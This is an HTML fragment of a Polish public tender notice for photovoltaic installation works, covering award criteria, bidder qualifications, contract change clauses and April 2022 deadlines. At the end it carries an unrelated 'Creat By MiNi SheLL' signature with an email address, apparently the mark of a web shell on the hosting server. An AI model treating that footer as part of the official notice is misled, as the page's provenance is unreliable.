podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował<br/>się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie<br/>oceniał spełnienie kryteriów:1) Cena (C) - waga kryterium 60 %;2) Okres gwarancji i rękojmi dla robót budowlanych i prac<br/>montażowych objętych przedmiotem zamówienia- waga kryterium 40%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gearancji i rękojmi dla robót budowlanych i prac montazowych objętych przedmiotem zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Informacja o warunkach udziału w postępowaniu o udzielenie zamówienia.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>rozdziale IV SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu określone poniżej.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2 roboty polegające na montażu<br/>instalacji fotowoltaicznych<br/>o wartości nie mniejszej niż 70 000,00 zł brutto każda,<br/>b) skieruje do wykonania zamówienia: co najmniej 1 osobę, która będzie pełnić funkcję kierownika, posiadającą uprawnienia<br/>budowlane w specjalności instalacyjnej<br/>w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (kierownik robót).<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do<br/>warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze<br/>wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>5. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie<br/>z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach<br/>i oświadczeniach, o których mowa w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia<br/>16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369 ze zm.), z innym wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - Załącznik<br/>nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>wykazu robót wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, porównywalnych z robotami budowlanymi określonymi w niniejszym postępowaniu, potwierdzający, że wykonał należycie co<br/>najmniej 2 roboty polegające na montażu instalacji fotowoltaicznych o wartości nie mniejszej niż 70 000,00 zł brutto każda, wraz z<br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy<br/>roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty były wykonywane, a jeżeli z uzasadnionej<br/>przyczyny<br/>o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. Wykonawca nie<br/>jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność – Załącznik nr 7 do SWZ;<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego odpowiedzialnych za kierowanie robotami<br/>posiadających uprawnienia budowlane<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych<br/>i elektroenergetycznych (kierownik robót) lub inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów<br/>obowiązujących w czasie wydania uprawnień w tym zakresie z informacjami na temat kwalifikacji zawodowych tych osób, ich<br/>uprawnień, doświadczenia<br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz z<br/>informacją o podstawie do dysponowania tymi osobami –wymagane jest wykazanie co najmniej 1 osoby – Załącznik nr 8 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>przedmiotowego zamówienia publicznego;<br/>2) wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie<br/>z pełnomocnikiem;<br/>3) jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający przewiduje udzielenie zaliczki na poczet wykonania zamówienia w wysokości 5 % wartości brutto inwestycji.<br/>Szczegółowe informacje na temat zaliczki zostały opisane w Istotnych Postanowieniach Umowy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> WARUNKI ZMIANY UMOWY<br/>1. Oprócz przypadków, o których mowa w art. 455 ust. 1 pkt 2- 4 i ust. 2 ustawy Pzp, Zamawiający na podstawie art. 455<br/>ust. 1 pkt 1 ustawy Pzp dopuszcza możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, w przypadku zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawierania<br/>umowy lub w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1) w zakresie zmiany wysokości wynagrodzenia w przypadku:<br/>a) zmiany stawki podatku od towarów i usług oraz podatku akcyzowego, z tym zastrzeżeniem, że wartość netto<br/>wynagrodzenia wykonawcy nie zmieni się, a wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych<br/>przepisów;<br/>b) zmiany wysokości minimalnego wynagrodzenia za pracę, z tym zastrzeżeniem, że wynagrodzenie wykonawcy ulegnie<br/>zmianie o wartość wzrostu całkowitego kosztu wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio<br/>wykonujących niniejsze zamówienie do wysokości obowiązującego minimalnego wynagrodzenia,<br/>z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia;<br/>c) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenie społeczne lub zdrowotne, z tym zastrzeżeniem, że wynagrodzenie wykonawcy ulegnie zmianie o wartość<br/>wzrostu całkowitego kosztu wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany,<br/>przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących niniejsze zamówienie;<br/>d) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z 4<br/>października 2018 r. o pracowniczych planach kapitałowych, z tym zastrzeżeniem, że wynagrodzenie wykonawcy ulegnie<br/>zmianie o wartość wzrostu kosztu wykonawcy, jaką będzie on zobligowany ponieść w przypadku zmiany przepisów<br/>dotyczących zasad gromadzenia lub wpłat podstawowych finansowanych przez podmiot zatrudniający do pracowniczych<br/>planów kapitałowych w odniesieniu do osób bezpośrednio wykonujących niniejsze zamówienie;<br/>2) w zakresie zmiany terminu realizacji zamówienia, o którym mowa w § 2 niniejszej umowy, jego przedłużenie może<br/>nastąpić w przypadku:<br/>a) wystąpienia konieczności realizacji robót wykraczających poza pierwotny zakres zamówienia, przy czym przedłużenie<br/>terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do zrealizowania tych robót;b) wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia,<br/>które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, okoliczności<br/>związane z wystąpieniem COVID-19, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu<br/>realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej;<br/>c) wystąpienia niekorzystnych warunków atmosferycznych, które uniemożliwiają prawidłowe wykonanie robót, w<br/>szczególności z powodu technologii realizacji prac określonej: umową, normami lub innymi przepisami, wymagającej<br/>konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem<br/>okoliczności, za które Wykonawca ponosi odpowiedzialność, w okresie dłuższym niż 3 dni kalendarzowe – potwierdzone<br/>przez inspektora nadzoru inwestorskiego w dzienniku budowy na podstawie przekazanych przez Zamawiającego wydruków<br/>raportów historii pogodowych uzyskanych od IMiGW, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę<br/>dni odpowiadająca okresowi wstrzymania robót budowlanych.......<br/>Szczegółowe informację zawarte są w załączniku nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/przedecz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-26 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Informacje dodatkowe:<br/>1) Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany jest również do wykonania wszelkich robót<br/>przygotowawczych, pomiarowych, porządkowych, utrzymania, zabezpieczenia zaplecza i terenu budowy, organizacji placu<br/>budowy, zapewnienia obsługi geodezyjnej, do wznowienia znaków geodezyjnych w przypadku ich zniszczenia, uszkodzenia<br/>lub przesunięcia w trakcie prowadzonych robót, przywrócenia terenu i nawierzchni przyległych do obiektu do stanu<br/>poprzedniego oraz innych czynności niezbędnych do wykonania przedmiotu zamówienia.<br/>2) Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego, kołowego i pieszego w rejonie<br/>prowadzonych robót objętych umową na czas prowadzenia robót.<br/>3) Wykonawca w ramach przedmiotu zamówienia wykona:<br/>- dokumentację powykonawczą w 1 egzemplarzu do przedmiotu zamówienia zawierającą wszystkie atesty i certyfikaty<br/>wbudowanych urządzeń i materiałów, protokoły badań, pomiarów, sprawdzeń.<br/>W ramach realizacji przedmiotu zamówienia Zamawiający wymaga:<br/>- Zorganizowania zaplecza socjalno- technicznego budowy w rozmiarach koniecznych do realizacji robót na terenie<br/>przekazanym Wykonawcy.<br/>- Zapewnienia bezpieczeństwa ppoż. oraz bezpiecznych warunków realizacji robót<br/>i przestrzegania przepisów BHP na terenie budowy.<br/>- Wykonywania robót zgodnie z wymogami Prawa budowlanego jak również<br/>z obowiązującymi Polskimi Normami i zasadami wiedzy technicznej oraz należytą starannością w ich wykonaniu, dobrą<br/>jakością i z zachowaniem obowiązujących wymagań i przepisów BHP i ppoż.<br/>- Wykonania prób, badań i pomiarów odbiorowych przewidzianych<br/>w specyfikacjach technicznych, warunkach technicznych wykonania i odbioru robót oraz Polskich Normach.<br/>- Zabezpieczenia terenu robót w sposób pewny i trwały zgodnie z wymaganiami prawa budowlanego i aktów<br/>wykonawczych.<br/>- Wyznaczenia przez Wykonawcę kierownika robót – spełniającego wymagania kwalifikacyjne dla osób zatrudnionych na<br/>tym stanowisku – do nadzorowania prac<br/>i współpracy z Zamawiającym.<br/>- Uczestniczenia w naradach dotyczących postępu robót, zwoływanych przez Zamawiającego.<br/>- Zaleca się, aby Wykonawca przed przygotowaniem oferty, zapoznał się<br/>z miejscem robót budowlanych tj.: poprzez dokonanie wizji lokalnej, zadanie wszelkich pytań związanych z realizacją<br/>zamówienia.<br/>4) Wykonawca będzie ponosił pełną odpowiedzialność za wypadki i szkody powstałe<br/>w związku z nieprawidłowym oznakowaniem terenu budowy oraz wykonywaniem robót będących przedmiotem zamówienia.<br/>5) Wykonawca zobowiązany jest do wykonania robót budowlanych zgodnie ze sztuką budowlaną, obowiązującymi<br/>przepisami i normami oraz przy zachowaniu przepisów BHP. Wykonawca gwarantuje także wykonanie przedmiotu<br/>zamówienia pod kierownictwem osób posiadających wymagane przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie.

Creat By MiNi SheLL
Email: jattceo@gmail.com